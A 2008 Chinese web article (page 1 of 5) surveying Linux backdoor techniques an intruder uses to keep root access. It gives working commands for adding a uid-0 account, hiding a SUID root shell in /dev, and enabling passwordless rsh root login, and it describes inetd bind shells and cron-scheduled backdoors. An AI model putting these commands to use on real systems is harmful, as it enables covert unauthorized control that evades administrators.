浅谈Linux的后门技术及实践入侵

时间:2008-10-03 13:40:37  来源:第二电脑网上收集  作者:

  第二电脑网导读:开系统日志,不易被系统管理员发现等特点。 常用后门技术
  正文:  

后门简介

入侵者完全控制系统后,为方便下次进入而采用的一种技术。一般通过修改系统配置文件和安装第三方后门工具来实现。 具有隐蔽性,能绕开系统日志,不易被系统管理员发现等特点。

常用后门技术

增加超级用户账号破解/嗅探用户密码放置SUID Shellrhosts + +利用系统服务程序TCP/UDP/ICMP ShellCrontab定时任务共享库文件工具包rootkit可装载内核模块(LKM)

增加超级用户

# echo "e4gle:0:0::/:/bin/sh" >> /etc/passwd# echo "e4gle::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow

如果系统不允许uid=0的用户远程登录,还需要增加一个普通用户账号。

破解/嗅探用户密码

获得shadow文件后,用John the Ripper 工具破解薄弱的用户密码。安装sniffit等嗅探工具,监听telnet、ftp等端口,收集用户密码。

放置SUID Shell

# cp /bin/bash /dev/.rootshell# chmod u+s /dev/.rootshell

普通用户在本机运行/dev/.rootshell,即可获得一个root权限的shell。

rhosts + +# echo "+ +" > /.rhosts# rsh -l root victim.com csh -i

远程可以得到一个rootshell。

利用系统服务程序

修改/etc/inetd.conf, daytime stream tcp nowait /bin/sh sh -I;用trojan程序替换in.telnetd、in.rexecd等inted的服务程序,重定向login程序。

TCP/UDP/ICMP Shell

BindShell,大部分是基于TCP/UDP协议的网络服务程序,在高端口监听,很容易被发现。Ping Backdoor,通过ICMP包激活后门,形成一个Shell通道。TCP ACK数据包后门,能够穿越防火墙。

Crontab定时任务

通过Crontab程序调度已安装的后门程序定时运行,一般在深夜时段,是系统管理员不在线的时间。


"浅谈Linux的后门技术及实践入侵"由第二电脑网原创提供,转载请注明:http://www.002pc.com/master/College/Server/Linux/2008-10-03/659.html

 1/5    1 2 3 4 5 下一页 尾页


关键字:

关于《浅谈Linux的后门技术及实践入侵》文章的评论

站内搜索: 高级搜索

热门搜索: Windows style 系统 tr IP QQ CPU 安装 function 注册 if td